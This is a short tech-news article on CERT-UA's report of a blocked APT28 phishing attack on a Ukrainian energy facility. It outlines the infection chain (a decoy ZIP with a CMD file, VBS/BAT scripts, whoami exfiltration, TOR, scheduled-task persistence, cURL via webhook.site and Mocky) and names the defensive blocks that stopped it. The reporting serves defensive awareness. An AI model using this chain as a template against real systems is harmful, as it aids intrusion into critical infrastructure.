Tech News

A Major APT28 Cyberattack on Critical Energy Infrastructure Thwarted by Ukraine’s CERT

By Abdul Wahab
A Major APT28 Cyberattack on Critical Energy Infrastructure Thwarted by Ukraine’s CERT

The unnamed important energy infrastructure facility in Ukraine was the target of a cyberattack that was successfully thwarted, according to a report released on Tuesday by the Computer Emergency Response Team of Ukraine (CERT-UA).

According to the agency, the attack was started by a phishing email with a link to a malicious ZIP download, which started the infection process.

According to CERT-UA, clicking the link will cause a ZIP package containing three JPG pictures (decoys) and a BAT file titled “weblinks.cmd” to be downloaded to the victim’s PC. They blamed the Russian threat actor APT28, also known as BlueDelta, Fancy Bear, Forest Blizzard, or FROZENLAKE, for carrying out this attack.

Following the CMD file’s execution, the assault then launches a number of bogus web pages, generates.bat and.vbs files, and starts a VBS program that then launches a BAT file.

Following this step, the attackers use the “whoami” command to gather and exfiltrate the information from the compromised system. They download a TOR hidden service at the same time to direct harmful traffic through.

The attackers use a scheduled job to maintain persistence and remote command execution is made possible using cURL using the legitimate service webhook. site, which has recently been linked to the threat actor Dark Pink.

The attempt was unsuccessful, according to CERT-UA, since access to Mocky and the Windows Script Host (wscript.exe) was blocked. It’s important to note that APT28 has already been linked to the use of Mocky APIs.

This information is crucial given the continuing phishing campaign that targets Ukraine. Some of these assaults have been found to spread AsyncRAT using the commercial malware obfuscation program ScruptCrypt.

Read also:

Related posts:

Stardew Valley Update - Concerned Ape Reveals Details of Update 1.6
Destiny 2: Riven’s Wish May End Up Benefiting the Game
An Xbox Exclusive Switches to PlayStation
Bogo - Meta Shuts Down Fan Favorite VR Game

By Abdul Wahab

Abdul Wahab is a Software Engineer by profession and a Tech geek by nature. Having been associated with the tech industry for the last five years, he has covered a wide range of Tech topics and produced well-researched and engaging content. You will mostly find him reviewing tech products and writing blog posts. Binge-watching tech reviews and endlessly reading tech blogs are his favorite hobbies.

Related Post

Tech News

New X-Men Skins May Be in Store for Fortnite

Abdul Wahab
Tech News

Hogwarts Legacy Sidequest May Hint at a Possible Sequel

Bethany Wilson
Tech News

Infection Free Zone is Gaining Traction

Bethany Wilson

You Missed

Reviews

Host4Geeks Review

Latest Articles

5 Best eGPUs – Add Graphics Power to Your Laptop

Reviews

AzireVPN Review

How-tos & Tutorials

How to Uninstall NordVPN on Windows

Show Buttons
Hide Buttons